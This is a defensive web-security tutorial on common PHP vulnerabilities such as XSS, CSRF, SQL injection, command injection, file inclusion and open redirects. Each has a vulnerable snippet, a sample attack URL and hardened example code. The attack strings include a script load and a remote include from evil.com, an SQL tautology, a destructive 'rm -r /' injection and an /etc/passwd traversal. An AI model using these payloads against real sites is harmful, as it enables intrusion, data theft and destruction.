ruk·si

🧑‍💻 Web Server Exploits

Updated at 2012-11-02 18:11

This note contains basic web server exploits.

In short, how to prevent most of these:

  • Simplify all external data you use.
  • Reduce the external data you use to the absolute minimum.
  • Validate all external data against whitelists, never blacklists.
  • Encode or parameterize data for the context it goes into (HTML, SQL, shell, URL); validation alone does not make it safe to use there.

Cross-site scripting (XSS): the attacker gets the user's browser to run attacker-controlled script in the context of a site the user trusts. One of the most common vulnerabilities on the web. Once an attacker can run JavaScript in your site's origin there is little you can do to stop them: the script sees the DOM and the session and can make any request the user could make. Usually caused by writing user input into HTML without encoding it for that context.

$nickname = $_GET['nickname'];           // attacker-controlled
echo "<div>Welcome $nickname!</div>\n";  // written into HTML without encoding
www.example.com/?nickname=<script src="https://evil.com/magic.js"></script>
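The vulnerable greeting beside a hardened version, as an added example that is not part of the original note. It assumes PHP 7+ and UTF-8 output; the parameter name, the nickname format and the sample payload are constructed for illustration.

```php
<?php
// Added example (not from the original note). Assumes UTF-8 pages; the
// nickname format below is an assumption about what the application accepts.

// Vulnerable: user input is written straight into the HTML body.
function greet_unsafe(string $nickname): string
{
    return "<div>Welcome $nickname!</div>\n";
}

// Hardened: encode for the HTML text context. ENT_QUOTES also escapes the
// single quote, so the same helper is safe inside quoted attribute values;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function greet_safe(string $nickname): string
{
    $encoded = htmlspecialchars($nickname, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<div>Welcome $encoded!</div>\n";
}

// Whitelist on the way in: a nickname has no business containing markup, so
// reject it early. Output encoding is still required, because the stored value
// may later be echoed by code that does not know where it came from.
function valid_nickname(string $nickname): bool
{
    return preg_match('/^[A-Za-z0-9_.-]{1,32}$/', $nickname) === 1;
}

$payload = '<script src="https://evil.com/magic.js"></script>';   // constructed sample input

echo greet_unsafe($payload);          // the browser fetches and executes the script
echo greet_safe($payload);            // the browser shows the tag as literal text
var_dump(valid_nickname($payload));   // rejected before it is ever stored
```

htmlspecialchars() is the right tool only for HTML body and attribute contexts. A value written into a JavaScript string, a URL parameter or a CSS property needs the encoding for that context instead.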

Cross-site request forgery (CSRF): the attacker makes a logged-in user's browser send a request the user never intended, for example by embedding it in an image tag or an auto-submitting form on a page the attacker controls. It works because the browser attaches the session cookie to every request to your site no matter which page issued it, and nothing in the request proves it came from your own page. The fix is to make state-changing actions require POST and carry a secret per-session token that a third-party page cannot read; the SameSite cookie attribute adds defence in depth.

<img src="https://example.com/transfer?amount=900&to=evilAccount" width="0" height="0">
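A per-session CSRF token for the transfer form above, as an added example that is not part of the original note. It assumes PHP 7+ with PHP sessions already used for login; the form fields, the /transfer handler and the session keys are made up for illustration.

```php
<?php
// Added example (not from the original note). Assumes PHP 7+ sessions; the
// session keys and form layout are assumptions.
session_start();

// One random token per session, reused by every form in that session.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Called at the top of every state-changing handler. hash_equals() compares
// in constant time, so the token cannot be guessed byte by byte.
function require_csrf_token(): void
{
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        http_response_code(405);              // an <img src=...> can only send GET
        exit('state-changing requests must use POST');
    }
    $sent = $_POST['csrf_token'] ?? '';
    if (!is_string($sent) || !hash_equals(csrf_token(), $sent)) {
        http_response_code(403);
        exit('invalid CSRF token');
    }
}

// The token travels in the page body, which another origin cannot read,
// while the session cookie travels on its own with every request.
function transfer_form(): string
{
    $token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="/transfer">'
         . '<input type="hidden" name="csrf_token" value="' . $token . '">'
         . '<input name="amount"><input name="to"><button>Send</button></form>';
}

// /transfer handler
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    require_csrf_token();
    // ... perform the transfer for the logged-in user ...
} else {
    echo transfer_form();
}
```

The forged image request in the note fails twice: it is a GET, and it carries no token. On PHP 7.3+ the session cookie can additionally be marked SameSite=Lax through session_set_cookie_params(), so most cross-site requests do not carry it at all.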

Remote file inclusion (a form of remote code execution): the attacker gets the server to fetch code from a source they control and execute it, the server-side counterpart of XSS. Usually caused by building an include path from user input. In PHP it also needs allow_url_include, which is off by default, but including a local file the attacker can write to (an upload, a log) gives the same result.

<?php include($_GET["module"] . ".php"); ?>   // attacker picks the file to execute
www.example.com/?module=http://evil.com/maliciousscript

SQL injection: the attacker gets to run SQL of their own or change the logic of the statement the application runs. Usually caused by building the SQL text from user input by string concatenation instead of using parameterized queries.

$username = $_GET['username'];
$password = $_GET['password'];
// mysql_* was removed in PHP 7; shown here as the original vulnerable pattern.
mysql_query("
    SELECT *
    FROM users
    WHERE username = '$username'
    AND password = '$password'
");
www.example.com/?username=tommi&password=secret' or 1=1--
// resulting clause: WHERE username = 'tommi' AND password = 'secret' or 1=1--'
// which is true for every row (in MySQL the -- comment needs a trailing space, so send --+ or --%20)
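The same login as a prepared statement, as an added example that is not part of the original note. It uses an in-memory SQLite database through PDO so it runs stand-alone; the table layout and the sample user are constructed, and PHP 7+ with pdo_sqlite is assumed. The prepare()/execute() calls are the same against MySQL.

```php
<?php
// Added example (not from the original note). SQLite in memory so the script
// is self-contained; table layout and the user "tommi" are constructed.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)');
$ins = $pdo->prepare('INSERT INTO users (username, password_hash) VALUES (?, ?)');
$ins->execute(['tommi', password_hash('hunter2', PASSWORD_DEFAULT)]);

// Vulnerable: the SQL text is assembled from user input. With the note's
// payload the clause becomes  ... AND password_hash = 'secret' or 1=1--'
// and matches every row, hashed column or not.
function login_unsafe(PDO $pdo, string $username, string $password): bool
{
    $sql = "SELECT * FROM users WHERE username = '$username' AND password_hash = '$password'";
    return $pdo->query($sql)->fetch(PDO::FETCH_ASSOC) !== false;
}

// Hardened: the parameter never becomes part of the SQL text, so quotes and
// comment markers inside it are just data. The password is never compared in
// SQL at all; the hash is verified in PHP in constant time.
function login(PDO $pdo, string $username, string $password): bool
{
    $stmt = $pdo->prepare('SELECT password_hash FROM users WHERE username = ?');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row !== false && password_verify($password, $row['password_hash']);
}

$payload = "secret' or 1=1--";   // constructed, the payload from the note

var_dump(login_unsafe($pdo, 'tommi', $payload));   // bypassed: the rewritten WHERE matches
var_dump(login($pdo, 'tommi', $payload));          // refused: the payload is just a wrong password
var_dump(login($pdo, 'tommi', 'hunter2'));         // the real password still works
```

Run it and login_unsafe() accepts the payload while login() rejects it. Note that prepared statements protect values only; a table or column name or an ORDER BY direction taken from user input still has to be checked against a whitelist.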

Command injection: the attacker gets the server to run shell commands of their own. Usually caused by concatenating user input into a command line that is handed to a shell (shell_exec, system, exec, backticks).

echo shell_exec('cat ' . $_GET['filename']);   // the shell parses the whole string
www.example.com/?filename=readme.txt;rm -r /
// the shell runs: cat readme.txt;rm -r /
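Two ways to handle the file name above, as an added example that is not part of the original note: quoting the argument if a shell is unavoidable, and avoiding the shell entirely. The docs directory and the helper names are assumed; PHP 7+ is assumed.

```php
<?php
// Added example (not from the original note). The "docs" directory and the
// accepted file-name format are assumptions.

// If a shell must be used: escapeshellarg() wraps the value in single quotes
// so ';', '|', '$(...)' and friends are literal characters. It does not stop
// an argument that starts with '-' from being read as an option, so "--" ends
// option parsing before the user value.
function cat_file_quoted(string $filename): string
{
    return shell_exec('cat -- ' . escapeshellarg($filename)) ?? '';
}

// Better: do not spawn a shell for something PHP can do itself, and whitelist
// the name before touching the filesystem. No slashes means no traversal, and
// a non-dot first character rules out "." and "..".
function read_doc(string $filename): ?string
{
    if (preg_match('/^[A-Za-z0-9_-][A-Za-z0-9_.-]*$/', $filename) !== 1) {
        return null;                           // rejected by the whitelist
    }
    $content = @file_get_contents(__DIR__ . '/docs/' . $filename);
    return $content === false ? null : $content;
}

$payload = 'readme.txt;rm -r /';               // constructed, the payload from the note

var_dump(cat_file_quoted($payload));           // cat complains about one odd file name; nothing is removed
var_dump(read_doc($payload));                  // never reaches the filesystem
var_dump(read_doc('readme.txt'));              // the legitimate case
```

If the program really has to be an external one, proc_open() with an argument array (PHP 7.4+) runs it without any shell in between, which removes the quoting problem at the root.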

Code injection: the attacker gets to execute code snippets of their own inside the run-time environment. Usually caused by running an evaluator (eval, create_function, variable function calls such as $func()) on user input. Do not evaluate external code; if code really has to be loaded from outside, verify its origin and integrity first.

$x = $_GET['arg'];
eval("\$myvar = $x;");   // $x is interpolated into the source text before eval() runs it
www.example.com/?arg=1; phpinfo()
// eval() executes: $myvar = 1; phpinfo();
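The eval() pattern replaced by a fixed map of allowed operations, as an added example that is not part of the original note. The operation names and the request parameters are made up; PHP 7+ is assumed.

```php
<?php
// Added example (not from the original note). Operation names are assumptions.

// The user may choose *which* of a fixed set of closures runs; the argument
// reaches the closure as data and is never turned into source text.
$operations = [
    'upper'   => static function (string $s): string { return strtoupper($s); },
    'reverse' => static function (string $s): string { return strrev($s); },
    'length'  => static function (string $s): string { return (string) strlen($s); },
];

function dispatch(array $operations, string $op, string $arg): ?string
{
    // Exact key match against the map; no eval, no $op(), no call_user_func($op).
    if (!array_key_exists($op, $operations)) {
        return null;                     // unknown operation: refuse, do not guess
    }
    return $operations[$op]($arg);
}

// Constructed sample requests, the last two carrying the note's payload.
var_dump(dispatch($operations, 'upper', 'hello'));
var_dump(dispatch($operations, 'phpinfo', '1; phpinfo()'));   // not in the map, so nothing runs
var_dump(dispatch($operations, 'upper', '1; phpinfo()'));     // uppercased as a plain string
```

The same rule applies to variable function names and method names built from input: look the user's choice up in a map you wrote, never call whatever string arrived.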

Directory traversal: the attacker reads or includes files outside the intended directory by putting path traversal sequences such as ../ into a user-supplied file name. Usually caused by not canonicalizing and checking user-supplied paths before use.

include("./" . $_GET['page']);   // "./" does not stop ".." from walking upwards
www.example.com/?page=../../../../../../../../etc/passwd
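One include helper covering both the remote inclusion case and the directory traversal case above, as an added example that is not part of the original note. The page is chosen from a whitelist and, as defence in depth, the resolved path is checked to lie inside the pages directory. The directory, the page names and the query parameter are assumed; PHP 7+ is assumed.

```php
<?php
// Added example (not from the original note). Directory and page names are
// assumptions; the whitelist is the control, the realpath() check is backup.

const PAGES_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = ['home', 'about', 'contact'];   // the only values that ever reach include()

function resolve_page(string $page): ?string
{
    // 1. Whitelist: "http://evil.com/x", "../../etc/passwd" or a name with a
    //    NUL byte is simply not in the list, so it never touches the filesystem.
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }
    // 2. Containment: realpath() collapses ".." and symlinks; the result must
    //    still start with the pages directory, or someone has tampered with it.
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $page . '.php');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$page = $_GET['page'] ?? 'home';
$path = is_string($page) ? resolve_page($page) : null;
if ($path === null) {
    http_response_code(404);
    exit('no such page');
}
include $path;
```

Keep allow_url_include off in php.ini regardless; the code above should never need it, and the setting is the only thing standing between an include bug and remote execution.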

Open redirect: the attacker controls where the user is sent after following a link on your site. A link that starts with your trusted domain can land the user on an identical-looking login page on the attacker's site that harvests their credentials. Usually caused by passing user input straight to the redirect.

$redirectUrl = $_GET['url'];          // anything the attacker put in the link
header("Location: $redirectUrl");
www.example.com/?url=https://evil.com/sploitCode.php
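A redirect that only accepts local paths or whitelisted hosts, as an added example that is not part of the original note. The parameter name, the host whitelist and the fallback page are assumed; PHP 7+ is assumed.

```php
<?php
// Added example (not from the original note). Parameter name, allowed hosts
// and the fallback target are assumptions.

function safe_redirect_target(string $url, array $allowedHosts = []): ?string
{
    // Local path: exactly one leading "/". "//evil.com" is a protocol-relative
    // URL and "/\evil.com" is treated the same way by some browsers, so both
    // are excluded by the lookahead.
    if (preg_match('#^/(?![/\\\\])#', $url) === 1) {
        return $url;
    }
    // Absolute URL: must parse, must be https, host must be on the whitelist.
    // "evil.com/sploitCode.php" has no scheme and no host and is rejected here;
    // so is "https://www.example.com@evil.com/", whose host is evil.com.
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    if (strtolower($parts['scheme']) !== 'https'
        || !in_array(strtolower($parts['host']), $allowedHosts, true)) {
        return null;
    }
    return $url;
}

// Constructed sample inputs
$tests = ['/account', '//evil.com', 'https://evil.com/sploitCode.php',
          'https://www.example.com/login', 'javascript:alert(1)'];
foreach ($tests as $t) {
    var_dump($t, safe_redirect_target($t, ['www.example.com']));
}

// In the handler: unknown targets fall back to the front page instead of erroring.
$target = safe_redirect_target((string) ($_GET['url'] ?? ''), ['www.example.com']);
header('Location: ' . ($target ?? '/'));
exit;
```

The simplest robust design is to not accept a URL at all: pass an opaque key ("after=account") and look the destination up server-side.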

Failure to restrict access: keeping scripts hidden or unlinked does not prevent attacks, it only slows them down; URLs leak through logs, Referer headers, browser history and plain guessing. Every critical function or file must itself check that the current user is authenticated and authorized to use it.

www.example.com/admins/editUser.php   // reachable by anyone who finds the URL unless the script checks authorization
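An authorization check that every admin script runs before doing anything else, as an added example that is not part of the original note. The session layout, the role names and the login URL are assumed; PHP 7+ sessions are assumed.

```php
<?php
// Added example (not from the original note). Session keys ("user_id",
// "role"), the role name and /login.php are assumptions.
session_start();

function require_role(string $role): void
{
    if (empty($_SESSION['user_id'])) {
        // Not logged in: send to login and stop. exit matters: header() on its
        // own does not stop the rest of the script from running.
        header('Location: /login.php');
        exit;
    }
    if (($_SESSION['role'] ?? '') !== $role) {
        http_response_code(403);        // logged in, but not allowed here
        exit('forbidden');
    }
}

// admins/editUser.php
require_role('admin');

// Object-level check as well: being an admin says nothing about whether this
// particular record may be edited, so check the target too (policy assumed).
$targetId = (int) ($_GET['id'] ?? 0);
if ($targetId <= 0) {
    http_response_code(400);
    exit('bad id');
}
// ... only now load and edit user $targetId ...
```

Put require_role() in a bootstrap file that every script includes first, so a forgotten check is the exception rather than the default. Web-server rules that require authentication for the whole /admins/ path are a useful second layer, not a replacement.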

MIME type mismatch (content sniffing): the attacker gets the user's browser to treat a file as HTML even though the server does not serve it as HTML. The file can then carry JavaScript that runs in your site's origin. IE9 and older decided the type from the content and from the URL, so a path ending in ;.html was rendered as HTML. Send an accurate Content-Type and the X-Content-Type-Options: nosniff header (honoured since IE8) on every response.

example.com/search/important.doc;.html   // the ";.html" suffix makes old IE render the document as HTML
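A download handler that fixes the type and refuses the suffix trick, as an added example that is not part of the original note. The upload directory, the accepted extensions and the query parameter are assumed; PHP 7+ is assumed.

```php
<?php
// Added example (not from the original note). The uploads directory and the
// set of accepted extensions are assumptions.

function send_document(string $name): void
{
    // A plain file name with one known extension; "important.doc;.html" fails
    // here, as does anything with a slash, a second extension or a quote.
    if (preg_match('/^[A-Za-z0-9_-]+\.(doc|pdf|txt)$/', $name) !== 1) {
        http_response_code(404);
        exit;
    }
    $path = __DIR__ . '/uploads/' . $name;
    if (!is_file($path)) {
        http_response_code(404);
        exit;
    }

    // Type comes from our own table, never from the client or from guessing.
    $types = ['doc' => 'application/msword', 'pdf' => 'application/pdf', 'txt' => 'text/plain'];
    $ext   = pathinfo($name, PATHINFO_EXTENSION);

    header('Content-Type: ' . $types[$ext]);
    header('X-Content-Type-Options: nosniff');      // the browser must not reinterpret the body
    header('Content-Disposition: attachment; filename="' . $name . '"');   // download, never render inline
    header('Content-Length: ' . filesize($path));
    readfile($path);
    exit;
}

send_document((string) ($_GET['file'] ?? ''));
```

The filename in Content-Disposition is safe to quote only because the whitelist already rejected quotes and control characters. User uploads that must be served inline are best served from a separate origin, so that even a successful sniff cannot reach your session.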